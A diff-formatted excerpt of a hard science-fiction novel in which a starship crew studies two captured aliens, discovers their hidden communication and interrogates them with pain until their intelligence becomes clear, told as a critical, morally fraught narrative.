+Fully-extended, the floating scrambler was over two meters across. The other seemed roughly the same size. Neither moved, except for those drifting arms. Navy-blue mosaics, almost black in the longwave, rippled across their surfaces like the patterns of wind on grass. Superimposed graphics plotted methane and hydrogen at reassuring Rorschach norms. Temperature and lighting, ditto. An icon for ambient electromagnetics remained dark.
+I dipped into the archives, watched the arrival of the aliens from two days past; each tumbling unceremoniously into its pen, balled up, hugging themselves as they bounced gently around their enclosures. Fetal position, I thought—but after a few moments the arms uncoiled, like the blooming of calcareous flowers.
+"Robert says Rorschach grows them," Susan James said behind me.
+I turned. Definitely James in there, but—muted, somehow. Her meal remained untouched. Her surfaces were dim.
+Except for the eyes. Those were deep, and a little hollow.
+"Grows?" I repeated.
+"In stacks. They have two navels each." She managed a weak smile, touched her belly with one hand and the small of her back with the other. "One in front, one behind. He thinks they grow in a kind of column, piled up. When the top one develops to a certain point, it buds off from the stack and becomes free-living."
+The archived scramblers were exploring their new environment now, climbing gingerly along the walls, unrolling their arms along the corners where the panels met. Those swollen central bodies struck me again. "So that first one, with the flattened..."
+"Juvenile," she agreed. "Fresh off the stack. These ones are older. They, they plump out as they mature. Robert says," she added after a moment.
+I sucked the dregs from my squeezebulb. "The ship grows its own crew."
+"If it's a ship." James shrugged. "If they're crew."
+I watched them move. There wasn't much to explore; the walls were almost bare, innocent of anything but a few sensor heads and gas nozzles. The pens had their own tentacles and manipulators for more invasive research needs, but those had been carefully sheathed during introduction. Still, the creatures covered the territory in careful increments, moving back and forth along parallel, invisible paths. Almost as if they were running transects.
+James had noticed it too. "It seems awfully systematic, doesn't it?"
+"What does Robert say about that?"
+"He says the behavior of honeybees and sphex wasps is just as complex, and it's all rote hardwiring. Not intelligence."
+"But bees still communicate, right? They do that dance, to tell the hive where the flowers are."
+She shrugged, conceding the point.
+"So you still might be able to talk to these things."
+"Maybe. You'd think." She massaged her brow between thumb and forefinger. "We haven't got anywhere, though. We played some of their pigment patterns back to them, with variations. They don't seem to make sounds. Robert synthesized a bunch of noises that they might squeeze out of their cloacae if they were so inclined, but those didn't get us anywhere either. Harmonic farts, really."
+"So we're sticking to the blood-cells-with-waldoes model."
+"Pretty much. But you know, they didn't go into a loop. Hardwired animals repeat themselves. Even smart ones pace, or chew their fur. Stereotyped behaviors. But these two, they gave everything a very careful once-over and then just—shut down."
+They were still at it in ConSensus, slithering across one wall, then another, then another, a slow screw-thread track that would leave no square centimeter uncovered.
+"Have they done anything since?" I asked.
+She shrugged again. "Nothing spectacular. They squirm when you poke them. Wave their arms back and forth—they do that pretty much constantly, but there's no information in it that we can tell. They haven't gone invisible on us or anything. We blanked the adjoining wall for a while so they could see each other, even piped audio and air feeds—Robert thought there might be some kind of pheromonal communication—but nothing. They didn't even react to each other."
+"Have you tried, well, motivating them?"
+"With what, Siri? They don't seem to care about their own company. We can't bribe them with food unless we know what they eat, which we don't. Robert says they're in no immediate danger of starvation anyway. Maybe when they get hungry they can deal."
+I killed the archival feed and reverted to realtime. "Maybe they eat—I don't know, radiation. Or magnetic energy. The cage can generate magnetic fields, right?"
+"Tried it." She took a breath, then squared her shoulders. "But I guess these things take time. He's only had a couple of days, and I only got out of the crypt myself a day ago. We'll keep trying."
+"What about negative reinforcement?" I wondered.
+She blinked. "Hurt them, you mean."
+"Not necessarily anything extreme. And if they're not sentient anyway..."
+Just like that, Susan went away. "Why, Keeton. you just made a suggestion. You giving up on this whole noninterference thing?"
+"Hello, Sascha. No, of course not. Just—making a list of what's been tried."
+"Good." There was an edge to her voice. "Hate to think you were slipping. We're going to grab some down time now, so maybe you could go and talk to Cunningham for a bit. Yeah, do that.
+"And be sure to tell him your theory about radiation-eating aliens. I bet he could use a laugh."
+
+*
+
+He stood at his post in BioMed, though his empty chair was barely a meter away. The ubiquitous cigarette hung from between the fingers of one hand, burned down and burned out. His other hand played with itself, fingers tapping against thumb in sequence, little to index, index to little. Windows crawled with intelligence in front of him; he wasn't watching.
+I approached from behind. I watched his surfaces in motion. I heard the soft syllables rising from his throat:
+"Yit-barah v'yish-tabah v'yit-pa-ar v'yit-romam..."
+Not his usual litany. Not even his usual language; Hebrew, ConSensus said.
+It sounded almost like a prayer...
+He must have heard me. His topology went flat and hard and almost impossible to decipher. It was increasingly difficult getting a fix on anyone these days, but even through those topological cataracts Cunningham— as always— was a tougher read than most.
+"Keeton," he said without turning.
+"You're not Jewish," I said.
+"It was." Szpindel, I realized after a moment. Cunningham didn't do gender pronouns.
+But Isaac Szpindel had been an atheist. All of us were. We'd all started out that way, at least.
+"I didn't know you knew him," I said. It certainly wasn't policy.
+Cunningham sank into his chair without looking at me. In his head, and in mine, a new window opened within a frame marked Electrophoresis.
+I tried again. "I'm sorry. I didn't mean to intru—"
+"What can I do for you, Siri?"
+"I was hoping you could bring me up to speed on your findings."
+A periodic chart of alien elements scrolled through the feed. Cunningham logged it and started another sample. "I've documented everything. It's all in ConSensus."
+I made a play for ego: "It would really help to know how you'd thumbnail it, though. What you think is important can be just as vital as the data themselves."
+He looked at me a moment. He muttered something, repetitive and irrelevant.
+"What's important is what's missing," he said after a moment. "I've got good samples now and I still can't find the genes. Protein synthesis is almost prionic—reconformation instead of the usual transcription pathways—but I can't figure out how those bricks get slotted into the wall once they're made."
+"Any progress on the energy front?" I asked.
+"Energy?"
+"Aerobic metabolism on an anaerobe budget, remember? You said they had too much ATP."
+"That I solved." He puffed smoke; far to stern a fleck of alien tissue liquefied and banded into chemical strata. "They're sprinting."
+Rotate that if you can.
+I couldn't. "How do you mean?"
+He sighed. "Biochemistry is a tradeoff. The faster you synthesize ATP, the more expensive each molecule becomes. It turns out scramblers are a lot more energy-efficient at making it than we are. They're just extremely slow at it, which might not be a big drawback for something that spends most of its time inactive. Rorschach—whatever Rorschach started out as— could have drifted for millennia before it washed up here. That's a lot of time to build up an energy reserve for bouts of high activity, and once you've laid the groundwork glycolysis is explosive. Two-thousand-fold boost, and no oxygen demand."
+"Scramblers sprint. Their whole lives."
+"They may come preloaded with ATP and burn it off throughout their lifespan."
+"How long would that be?"
+"Good question," he admitted. "Live fast, die young. If they ration it out, stay dormant most of the time—who knows?"
+"Huh." The free-floating scrambler had drifted away from the center of its pen. One extended arm held a wall at bay; the others continued their hypnotic swaying.
+I remembered other arms, their motion not so gentle.
+"Amanda and I chased one into a crowd. It—"
+Cunningham was back at his samples. "I saw the record."
+"They tore it to pieces."
+"Uh huh."
+"Any idea why?"
+He shrugged. "Bates thought there might be some kind of civil war going on down there."
+"What do you think?"
+"I don't know. Maybe it's right, or maybe scramblers are ritual cannibals, or—they're aliens, Keeton. What do you want from me?"
+"But they're not really aliens. At least not intelligent ones. War implies intelligence."
+"Ants wage war all the time. Proves nothing except that they're alive."
+"Are scramblers even alive?" I asked.
+"What kind of question is that?"
+"You think Rorschach grows them on some kind of assembly line. You can't find any genes. Maybe they're just biomechanical machines."
+"That's what life is, Keeton. That's what you are." Another hit of nicotine, another storm of numbers, another sample. "Life isn't either/or. It's a matter of degree."
+"What I'm asking is, are they natural? Could they be constructs?"
+"Is a termite mound a construct? Beaver dam? Space ship? Of course. Were they built by naturally-evolved organisms, acting naturally? They were. So tell me how anything in the whole deep multiverse can ever be anything but natural?"
+I tried to keep the irritation out of my voice. "You know what I mean."
+"It's a meaningless question. Get your head out of the Twentieth Century."
+I gave up. After a few seconds Cunningham seemed to notice the silence. He withdrew his consciousness from the machinery and looked around with fleshly eyes, as if searching for some mosquito that had mysteriously stopped whining.
+"What's your problem with me?" I asked. Stupid question, obvious question. Unworthy of any synthesist to be so, so direct.
+His eyes glittered in that dead face. "Processing without comprehension. That's what you do, isn't it?"
+"That's a colossal oversimplification."
+"Mmm." Cunningham nodded. "Then why can't you seem to comprehend how pointless it is to keep peeking over our shoulders and writing home to our masters?"
+"Someone has to keep Earth in the loop."
+"Seven months each way. Long loop."
+"Still."
+"We're on our own out here, Keeton. You're on your own. The game's going to be long over before our masters even know it's started." He sucked smoke. "Or perhaps not. Perhaps you're talking to someone closer, hmm? That it? Is the Fourth Wave telling you what to do?"
+"There is no Fourth Wave. Not that anyone's told me, anyway."
+"Probably not. They'd never risk their lives out here, would they? Too dangerous even to hang back and watch from a distance. That's why they built us."
+"We're all self-made. Nobody forced you to get the rewire."
+"No, nobody forced me to get the rewire. I could have just let them cut out my brain and pack it into Heaven, couldn't I? That's the choice we have. We can be utterly useless, or we can try and compete against the vampires and the constructs and the AIs. And perhaps you could tell me how to do that without turning into a—an utter freak."
+So much in the voice. Nothing at all on the face. I said nothing.
+"See what I mean? No comprehension." He managed a tight smile. "So I'll answer your questions. I'll delay my own work and hold your hand because Sarasti's told us to. I guess that superior vampire mind sees some legitimate reason to indulge your constant ankle-nipping, and it's in charge so I'll play along. But I'm not nearly that smart, so you'll forgive me if it all seems a bit naff."
+"I'm just—"
+"You're just doing your job. I know. But I don't like being played, Keeton. And that's what your job is."
+
+*
+
+Even back on Earth, Robert Cunningham had barely disguised his opinion of the ship's commissar. It had been obvious even to the topologically blind.
+I'd always had a hard time imagining the man. It wasn't just his expressionless face. Sometimes, not even the subtler things behind would show up in his topology. Perhaps he repressed them deliberately, resenting the presence of this mole among the crew.
+It would hardly have been the first time I'd encountered such a reaction. Everyone resented me to some extent. Oh, they liked me well enough, or thought they did. They tolerated my intrusions, and cooperated, and gave away far more than they thought they did.
+But beneath Szpindel's gruff camaraderie, beneath James's patient explanations—there was no real respect. How could there be? These people were the bleeding edge, the incandescent apex of hominid achievement. They were trusted with the fate of the world. I was just a tattletale for small minds back home. Not even that much, when home receded too deeply into the distance. Superfluous mass. Couldn't be helped. No use getting bothered over it.
+Still, Szpindel had only coined commissar half-jokingly. Cunningham believed it, and didn't laugh. And while I'd encountered many others like him over the years, those had only tried to hide themselves from sight. Cunningham was the first who seemed to succeed.
+I tried to build the relationship all the way through training, tried to find the missing pieces. I watched him working the simulator's teleops one day, exercising the shiny new interfaces that spread him through walls and wires. He was practicing his surgical skills on some hypothetical alien the computer had conjured up to test his technique. Sensors and jointed teleops sprouted like the legs of an enormous spider crab from an overhead mount. Spirit-possessed, they dipped and weaved around some semiplausible holographic creature. Cunningham's own body merely trembled slightly, a cigarette jiggling at the corner of its mouth.
+I waited for him to take a break. Eventually the tension ebbed from his shoulders. His vicarious limbs relaxed.
+"So." I tapped my temple. "Why'd you do it?"
+He didn't turn. Above the dissection, sensors swiveled and stared back like dismembered eyestalks. That was the center of Cunningham's awareness right now, not this nicotine-stained body in front of me. Those were his eyes, or his tongue, or whatever unimaginable bastard-senses he used to parse what the machines sent him. Those clusters aimed back at me, at us—and if Robert Cunningham still possessed anything that might be called vision, he was watching himself from eyes two meters outside his own skull.
+"Do what, exactly?" he said at last. "The enhancements?"
+Enhancements. As though he'd upgraded his wardrobe instead of ripping out his senses and grafting new ones into the wounds.
+I nodded.
+"It's vital to keep current," he said. "If you don't reconfigure you can't retrain. If you don’t retrain you're obsolete inside a month, and then you're not much good for anything except Heaven or dictation."
+I ignored the jibe. "Pretty radical transformation, though."
+"Not these days."
+"Didn't it change you?"
+His body dragged on the cigarette. Targeted ventilation sucked away the smoke before it reached me. "That's the whole point."
+"Surely you were affected personally, though. Surely—"
+"Ah." He nodded; at the far end of shared motor nerves, teleops jiggled in sympathy. "Change the eyes that look at the world, change the me does the looking?"
+"Something like that."
+Now he was watching me with fleshly eyes. Across the membrane those snakes and eyestalks returned to their work on the virtual carcass, as if deciding they'd wasted enough time on pointless distractions. I wondered which body he was in now.
+"I'm surprised you'd have to ask," the meat one said. "Doesn't my body language tell you everything? Aren't jargonauts supposed to read minds?"
+He was right, of course. I wasn't interested in Cunningham's words; those were just the carrier wave. He couldn't hear the real conversation we were having. All his angles and surfaces spoke volumes, and although their voices were strangely fuzzed with feedback and distortion I knew I'd be able to understand them eventually. I only had to keep him talking.
+But Jukka Sarasti chose that moment to wander past and surgically trash my best-laid plans.
+"Siri's best in his field," he remarked. "But not when it gets too close to home."
+
+Why should man expect his prayer for mercy to be heard by What is above him when he shows no mercy to what is under him?
+—Pierre Troubetzkoy
+
+"The thing is," Chelsea said, "this whole first-person thing takes effort. You have to care enough to try, you know? I've been working my ass off on this relationship, I've been working so hard, but you just don't seem to care..."
+She thought she was breaking the news. She thought I hadn't seen it coming, because I hadn't said anything. I'd probably seen it before she had. I hadn't said anything because I'd been scared of giving her an opening.
+I felt sick to my stomach.
+"I care about you," I said.
+"As much as you could care about anything," she admitted. "But you—I mean, sometimes you're fine, Cygnus, sometimes you're wonderful to be around but whenever anything gets the least bit intense you just go away and leave this, this battle computer running your body and I just can't deal with it any more..."
+I stared at the butterfly on the back of her hand. Its wings flexed and folded, lazy and iridescent. I wondered how many of those tattoos she had; I'd seen five of them on different body parts, albeit only one at a time. I thought about asking her, but this didn't seem like the right moment.
+"You can be so—so brutal sometimes," she was saying. "I know you don't mean to be, but... I don't know. Maybe I'm your pressure-release valve, or something. Maybe you have to submerge yourself so much on the job that everything just, just builds up and you need some kind of punching bag. Maybe that's why you say the things you do."
+She was waiting for me to say something now. "I've been honest," I said.
+"Yeah. Pathologically. Have you ever had a negative thought that you haven't said out loud?" Her voice trembled but her eyes—for once— stayed dry. "I guess it's as much my fault as yours. Maybe more. I could tell you were—disconnected, from the day we met. I guess on some level I always saw it coming."
+"Why even try, then? If you knew we were just going to crash and burn like this?"
+"Oh, Cygnus. Aren't you the one who says that everyone crashes and burns eventually? Aren't you the one who says it never lasts?"
+Mom and Dad lasted. Longer than this, anyway.
+I frowned, astonished that I'd even let the thought form in my head. Chelse read the silence as a wounded one. "I guess—maybe I thought I could help, you know? Help fix whatever made you so—so angry all the time."
+The butterfly was starting to fade. I'd never seen that happen before.
+"Do you understand what I'm saying?" she asked.
+"Sure. I'm a fixer-upper."
+"Siri, you wouldn't even get a tweak when I offered. You were so scared of being manipulated you wouldn't even try a basic cascade. You're the one guy I've met who might be truly, eternally unfixable. I dunno. Maybe that's even something to be proud of."
+I opened my mouth, and closed it.
+She gave me a sad smile. "Nothing, Siri? Nothing at all? There was a time you always knew exactly what to say." She looked back at some earlier version of me. "Now I wonder if you ever actually meant any of it."
+"That's not fair."
+"No." She pursed her lips. "No, it isn't. That's not really what I'm trying to say. I guess...it's not so much that you don't mean any of it. It's more like you don't know what any of it means."
+The color was gone from the wings. The butterfly was a delicate charcoal dusting, almost motionless.
+"I'll do it now," I said. "I'll get the tweaks. If it's that important to you. I'll do it now."
+"It's too late, Siri. I'm used up."
+Maybe she wanted me to call her back. All these words ending in question marks, all these significant silences. Maybe she was giving me the opportunity to plead my case, to beg for another chance. Maybe she wanted a reason to change her mind.
+I could have tried. Please don't, I could have said. I'm begging you. I never meant to drive you away completely, just a little, just to a safer distance. Please. In thirty long years the only time I haven't felt worthless was when we were together.
+But when I looked up again the butterfly was gone and so was she, taking all baggage with her. She carried doubt, and guilt for having led me on. She left believing that our incompatibility was no one's fault, that she'd tried as hard as she could, even that I had under the tragic weight of all my issues. She left, and maybe she didn't even blame me, and I never even knew who'd made that final decision.
+I was good at what I did. I was so damned good, I did it without even meaning to.
+
+*
+
+"My God! Did you hear that!?"
+Susan James bounced around the drum like a pronking wildebeest in the half-gravity. I could see the whites of her eyes from ninety degrees away. "Check your feeds! Check your feeds! The pens!"
+I checked. One scrambler afloat; the other still jammed into its corner.
+James landed at my side with a two-footed thump, wobbling for balance. "Turn the sound up!"
+The hissing of the air conditioners. The clank of distant machinery echoing along the spine; Theseus' usual intestinal rumblings. Nothing else.
+"Okay, they're not doing it now." James brought up a splitscreen window and threw it into reverse. "There," she pronounced, replaying the record with the audio cranked and filtered.
+In the right side of the window, the floating scrambler had drifted so that the tip of one outstretched arm brushed against the wall that adjoined the other pen. In the left side, the huddled scrambler remained unmoving.
+I thought I heard something. Just for an instant: the brief buzz of an insect, perhaps, if the nearest insect hadn't been five trillion kilometers away.
+"Replay that. Slow it down."
+A buzz, definitely. A vibration.
+"Way down."
+A click train, squirted from a dolphin's forehead. Farting lips.
+"No, let me." James bulled into Cunningham's headspace and yanked the slider to the left.
+Tick tick...tick...tick tick tick...tick...tick tick tick...
+Dopplered down near absolute zero, it went on for almost a minute. Total elapsed real time was about half a second.
+Cunningham zoomed the splitscreen. The huddled scrambler had remained motionless, except for the rippling of its cuticle and the undulation of its free arms. But before I'd only seen eight arms—and now I could make out the bony spur of a ninth peeking from behind the central mass. A ninth arm, curled up and hidden from view, tick tick ticking while another creature casually leaned against the other side of the wall...
+Now, there was nothing. The floating scrambler had drifted aimlessly back to the center of its enclosure.
+James's eyes shone. "We've got to check the rest of—"
+But Theseus had been watching, and was way ahead of us. It had already searched the archives and served up the results: three similar exchanges over two days, ranging in duration from a tenth of a second to almost two.
+"They're talking," James said.
+Cunningham shrugged, a forgotten cigarette burning down between his fingers. "So do a lot of things. And at that rate of exchange they're not exactly doing calculus. You could get as much information out of a dancing honeybee."
+"That's nonsense and you know it, Robert."
+"What I know is that—"
+"Honeybees don't deliberately hide what they're saying. Honeybees don't develop whole new modes of communication configured specifically to confound observers. That's flexible, Robert. That's intelligent."
+"And what if it is, hmm? Forget for a moment the inconvenient fact that these things don't even have brains. I really don't think you've thought this through."
+"Of course I have."
+"Indeed? Then what are you so happy about? Don't you know what this means?"
+Sudden prickling on the back of my neck. I looked around; I looked up. Jukka Sarasti had appeared in the center of the drum, eyes gleaming, teeth bared, watching us.
+Cunningham followed my gaze, and nodded. "I'd wager it does..."
+
+*
+
+There was no way to learn what they'd whispered across that wall. We could recover the audio easily enough, parse every tick and tap they'd exchanged, but you can't decipher a code without some idea of content. We had patterns of sound that could have meant anything. We had creatures whose grammar and syntax—if their mode of communication even contained such attributes—were unknown and perhaps unknowable. We had creatures smart enough to talk, and smart enough to hide that fact. No matter how much we wanted to learn, they were obviously unwilling to teach us.
+Not without—how had I put it?— negative reinforcement.
+It was Jukka Sarasti who made the decision. We did it on his orders, as we did everything else. But after the word had come down— after Sarasti had disappeared in the night and Bates had retreated down the spine and Robert Cunningham had returned to his studies at the back of the drum—I was the one Susan James was left with. The first to speak the vile thought aloud, the official witness to posterity. I was the one she looked at, and looked away from, her surfaces hard and refractory.
+And then she started.
+
+*
+
+This is how you break down the wall:
+Start with two beings. They can be human if you like, but that's hardly a prerequisite. All that matters is that they know how to talk among themselves.
+Separate them. Let them see each other, let them speak. Perhaps a window between their cages. Perhaps an audio feed. Let them practice the art of conversation in their own chosen way.
+Hurt them.
+It may take a while to figure out how. Some may shrink from fire, others from toxic gas or liquid. Some creatures may be invulnerable to blowtorches and grenades, but shriek in terror at the threat of ultrasonic sound. You have to experiment; and when you discover just the right stimulus, the optimum balance between pain and injury, you must inflict it without the remorse.
+You leave them an escape hatch, of course. That's the very point of the exercise: give one of your subjects the means to end the pain, but give the other the information required to use it. To one you might present a single shape, while showing the other a whole selection. The pain will stop when the being with the menu chooses the item its partner has seen. So let the games begin. Watch your subjects squirm. If—when—they trip the off switch, you'll know at least some of the information they exchanged; and if you record everything that passed between them, you'll start to get some idea of how they exchanged it.
+When they solve one puzzle, give them a new one. Mix things up. Switch their roles. See how they do at circles versus squares. Try them out on factorials and Fibonnaccis. Continue until Rosetta Stone results.
+This is how you communicate with a fellow intelligence: you hurt it, and keep on hurting it, until you can distinguish the speech from the screams.
+Susan James—congenital optimist, high priestess of the Church of the Healing Word, was best qualified to design and execute the protocols. Now, at her command, the scramblers writhed. They pulled themselves around their cages in elliptical loops, desperately seeking any small corner free of stimulus. James had piped the feed into ConSensus, although there was no mission-critical reason for Theseus' whole crew to bear witness to the interrogation.
+"Let them block it at their ends," she said quietly, "If they want to."
+For all his reluctance to accept that these were beings, intelligent and aware, Cunningham had named the prisoners. Stretch tended to float spread-eagled; Clench was the balled-up corner-hugger. Susan, playing her own part in this perverse role-reversal, had simply numbered them One and Two. It wasn't that Cunningham's choices were too cheesy for her to stomach, or that she objected to slave names on principle. She'd just fallen back on the oldest trick in the Torturer's Handbook, the one that lets you go home to your family after work, and play with your children, and sleep at night: never humanize your victims.
+It shouldn't have been such an issue when dealing with methane-breathing medusae. I guess every little bit helped.
+Biotelemetry danced across the headspace beside each alien, luminous annotations shuddering through thin air. I had no idea what constituted normal readings for these creatures, but I couldn't imagine those jagged spikes passing for anything but bad news. The creatures themselves seethed subtly with fine mosaics in blue and gray, fluid patterns rippling across their cuticles. Perhaps it was a reflexive reaction to the microwaves; for all we knew it was a mating display.
+More likely they were screaming.
+James killed the microwaves. In the left-hand enclosure, a yellow square dimmed; in the right, an identical icon nested among others had never lit.
+The pigment flowed faster in the wake of the onslaught; the arms slowed but didn't stop. They swept back and forth like listless, skeletal eels.
+"Baseline exposure. Five seconds, two hundred fifty Watts." She spoke for the record. Another affectation; Theseus recorded every breath on board, every trickle of current to five decimal places.
+"Repeat."
+The icon lit up. More tile patterns, flash-flooding across alien skin. But this time, neither alien moved from where it was. Their arms continued to squirm slightly, a torqued trembling variation on the undulation they effected at rest. The telemetry was as harsh as ever, though.
+They learned helplessness fast enough, I reflected.
+I glanced at Susan. "Are you going to do this all yourself?"
+Her eyes were bright and wet as she killed the current. Clench's icon dimmed. Stretch's remained dormant.
+I cleared my throat. "I mean—"
+"Who else is going to do this, Siri? Jukka? You?"
+"The rest of the Gang. Sascha could—"
+"Sascha?" She stared at me. "Siri, I created them. Do you think I did that so I could hide behind them when—so I could force them to do things like this?" She shook her head. "I'm not bringing them out. Not for this. I wouldn't do that to my worst enemy."
+She turned away from me. There were drugs she could have taken, neuroinhibitors to wash away the guilt, short-circuit it right down in the molecules. Sarasti had offered them up as if he were tempting some solitary messiah in the desert. James had refused him, and would not say why.
+"Repeat," she said.
+The current flickered on, then off.
+"Repeat," she said again.
+Not a twitch.
+I pointed. "I see it," she said.
+Clench had pressed the tip of one arm against the touchpad. The icon there glowed like a candle flame.
+
+*
+
+Six and a half minutes later they'd graduated from yellow squares to time-lapsed four-dimensional polyhedrons. It took them as long to distinguish between two twenty-six-faceted shifting solids—differing by one facet in a single frame—as it took them to tell the difference between a yellow square and a red triangle. Intricate patterns played across their surfaces the whole time, dynamic needlepoint mosaics flickering almost too fast to see.
+"Fuck," James whispered.
+"Could be splinter skills." Cunningham had joined us in ConSensus, although his body remained halfway around BioMed.
+"Splinter skills," she repeated dully.
+"Savantism. Hyperperformance at one kind of calculation doesn't necessarily connote high intelligence."
+"I know what splinter skills are, Robert. I just think you're wrong."
+"Prove it."
+So she gave up on geometry and told the scramblers that one plus one equaled two. Evidently they knew that already: ten minutes later they were predicting ten-digit prime numbers on demand.
+She showed them a sequence of two-dimensional shapes; they picked the next one in the series from a menu of subtly-different alternatives. She denied them multiple choice, showed them the beginning of a whole new sequence and taught them to draw on the touch-sensitive interface with the tips of their arms. They finished that series in precise freehand, rendered a chain of logical descendants ending with a figure that led inexorably back to the starting point.
+"These aren't drones." James's voice caught in her throat.
+"This is all just crunching," Cunningham said. "Millions of computer programs do it without ever waking up."
+"They're intelligent, Robert. They're smarter than us. Maybe they're smarter than Jukka. And we're—why can't you just admit it?"
+I could see it all over her: Isaac would have admitted it.
+"Because they don't have the circuitry," Cunningham insisted. "How could—"
+"I don't know how!" she cried. "That's your job! All I know is that I'm torturing beings that can think rings around us..."
+"Not for much longer, at least. Once you figure out the language—"
+She shook her head. "Robert, I haven't a clue about the language. We've been at it for—for hours, haven't we? The Gang's all here, language databases four thousand years thick, all the latest linguistic algorithms. And we know exactly what they're saying, we're watching every possible way they could be saying it. Right down to the Angstrom."
+"Precisely. So—"
+"I've got nothing. I know they're talking through pigment mosaics. There might even be something in the way they move those bristles. But I can't find the pattern, I can't even follow how they count, much less tell them I'm...sorry..."
+Nobody spoke for a while. Bates watched us from the galley on our ceiling, but made no attempt to join the proceedings. On ConSensus the reprieved scramblers floated in their cages like multiarmed martyrs.
+"Well," Cunningham said at last, "since this seems to be the day for bad news, here's mine. They're dying."
+James put her face in her hand.
+"It's not your interrogation, for whatever that's worth," the biologist continued. "As far as I can determine, some of their metabolic pathways are just missing."
+"Obviously you just haven't found them yet." That was Bates, speaking up from across the drum.
+"No," Cunningham said, slowly and distinctly, "obviously those parts aren't available to the organism. Because they're falling apart pretty much the same way you'd expect one of us to, if—if all the mitotic spindles in our cells just vanished out of the cytoplasm, for example. As far as I can tell they started deteriorating the moment we took them off Rorschach."
+Susan looked up. "Are you saying they left part of their biochemistry behind?"
+"Some essential nutrient?" Bates suggested. "They're not eating—"
+"Yes to the linguist. No to the major." Cunningham fell silent; I glanced across the drum to see him sucking on a cigarette. "I think a lot of the cellular processes in these things are mediated externally. I think the reason I can't find any genes in my biopsies is because they don't have any."
+"So what do they have instead?" Bates asked.
+"Turing morphogens."
+Blank looks, subtitling looks. Cunningham explained anyway: "A lot of biology doesn't use genes. Sunflowers look the way they do because of purely physical buckling stress. You get Fibonacci sequences and Golden ratios everywhere in nature, and there's no gene that codes for them; it's all just mechanical interactions. Take a developing embryo—the genes say start growing or stop growing, but the number of digits and vertebrae result from the mechanics of cells bumping against other cells. Those mitotic spindles I mentioned? Absolutely essential for replication in every eukaryotic cell, and they accrete like crystals without any genetic involvement. You'd be surprised how much of life is like that."
+"But you still need genes," Bates protested, walking around to join us.
+"Genes just establish the starting conditions to enable the process. The structure that proliferates afterwards doesn't need specific instructions. It's classic emergent complexity. We've known about it for over a century." Another drag on the stick. "Or even longer. Darwin cited honeycomb way back in the eighteen hundreds."
+"Honeycomb," Bates repeated.
+"Perfect hexagonal tubes in a packed array. Bees are hardwired to lay them down, but how does an insect know enough geometry to lay down a precise hexagon? It doesn't. It's programmed to chew up wax and spit it out while turning on its axis, and that generates a circle. Put a bunch of bees on the same surface, chewing side-by-side, and the circles abut against each other—deform each other into hexagons, which just happen to be more efficient for close packing anyway."
+Bates pounced: "But the bees are programmed. Genetically."
+"You misunderstand. Scramblers are the honeycomb."
+"Rorschach is the bees," James murmured.
+Cunningham nodded. "Rorschach is the bees. And I don't think Rorschach's magnetic fields are counterintrusion mechanisms at all. I think they're part of the life-support system. I think they mediate and regulate a good chunk of scrambler metabolism. What we've got back in the hold is a couple of creatures dragged out of their element and holding their breath. And they can't hold it forever."
+"How long?" James asked.
+"How should I know? If I'm right, I'm not even dealing with complete organisms here."
+"Guess," Bates said.
+He shrugged. "A few days. Maybe."
+"That which does not kill us, makes us stranger."
+—Trevor Goodchild
+
+"You still don't vote," Sarasti said.
+We would not be releasing the prisoners. Too risky. Out here in the endless wastelands of the Oort there was no room for live and let live. Never mind what the Other has done, or what it hasn't: think of what it could do, if it were just a little stronger. Think of what it might have done, if we'd arrived as late as we were supposed to. You look at Rorschach and perhaps you see an embryo or a developing child, alien beyond comprehension perhaps but not guilty, not by default. But what if those are the wrong eyes? What if you should be seeing an omnipotent murdering God, a planet-killer, not yet finished? Vulnerable only now, and for a little longer?
+There was no vampire opacity to that logic, no multidimensional black boxes for humans to shrug at and throw up their hands. There was no excuse for the failure to find fault with Sarasti's reasoning, beyond the fact that his reasoning was without fault. That made it worse. The others, I knew, would rather have had to take something on faith.
+But Sarasti had an alternative to capture-release, one he evidently considered much safer. It took an act of faith to accept that reasoning, at least; by any sane measure it verged on suicide.
+Now Theseus gave birth by Caesarian. These progeny were far too massive to fit through the canal at the end of the spine. The ship shat them as if constipated, directly into the hold: great monstrous things, bristling with muzzles and antennae. Each stood three or four times my height, a pair of massive rust-colored cubes, every surface infested with topography. Armor plating would hide most of it prior to deployment, of course. Ribbons of piping and conduit, ammunition reservoirs and shark-toothed rows of radiator fins— all to disappear beneath smooth reflective shielding. Only a few island landmarks would rise above that surface: comm ports, thrust nozzles, targeting arrays. And gun ports, of course. These things spat fire and brimstone from a half-dozen mouths apiece.
+But for the time being they were just giant mechanical fetuses, half-extruded, their planes and angles a high-contrast jigsaw of light and shadow in the harsh white glow of the hold's floodlamps.
+I turned from the port. "That's got to take our substrate stockpiles down a bit."
+"Shielding the carapace was worse." Bates monitored construction through a dedicated flatscreen built right into the Fab bulkhead. Practicing, perhaps; we'd be losing our inlays as soon as the orbit changed. "We're tapping out, though. Might have to grab one of the local rocks before long."
+"Huh." I looked back into the hold. "You think they're necessary?"
+"Doesn't matter what I think. You're a bright guy, Siri. Why can't you figure that out?"
+"It matters to me. That means it matters to Earth."
+Which might mean something, if Earth was calling the shots. Some subtext was legible no matter how deep in the system you were.
+I tacked to port: "How about Sarasti and the Captain, then? Any thoughts?"
+"You're usually a bit more subtle."
+That much was true. "It's just, you know Susan was the one that caught Stretch and Clench tapping back and forth, right?"
+Bates winced at the names. "So?"
+"Well, some might think it odd that Theseus wouldn't have seen it first. Since quantum computers are supposed to be so proficient at pattern-matching."
+"Sarasti took the quantum modules offline. The onboard's been running in classical mode since before we even made orbit."
+"Why?"
+"Noisy environment. Too much risk of decoherence. Quantum computers are finicky things."
+"Surely the onboard's shielded. Theseus is shielded."
+Bates nodded. "As much as feasible. But perfect shielding is perfect blindness, and this is not the kind of neighborhood where you want to keep your eyes closed."
+Actually, it was. But I took her point.
+I took her other point, too, the one she didn't speak aloud: And you missed it. Something sitting right there in ConSensus for anyone to see. Top-of-the-line synthesist like you.
+"Sarasti knows what he's doing, I guess," I admitted, endlessly aware that he might be listening. "He hasn't been wrong yet, as far as we know."
+"As far as we can know," Bates said.
+"If you could second-guess a vampire, you wouldn't need a vampire," I remembered.
+She smiled faintly. "Isaac was a good man. You can't always believe the PR, though."
+"You don't buy it?" I asked, but she was already thinking she'd said too much. I threw out a hook baited with just the right mix of skepticism and deference: "Sarasti did know where those scramblers would be. Nailed it almost the meter, out of that whole maze."
+"I suppose that might have taken some kind of superhuman logic," she admitted, thinking I was so fucking dumb she couldn't believe it.
+"What?" I said.
+Bates shrugged. "Or maybe he just realized that since Rorschach was growing its own crew, we'd run into more every time we went in. No matter where we landed."
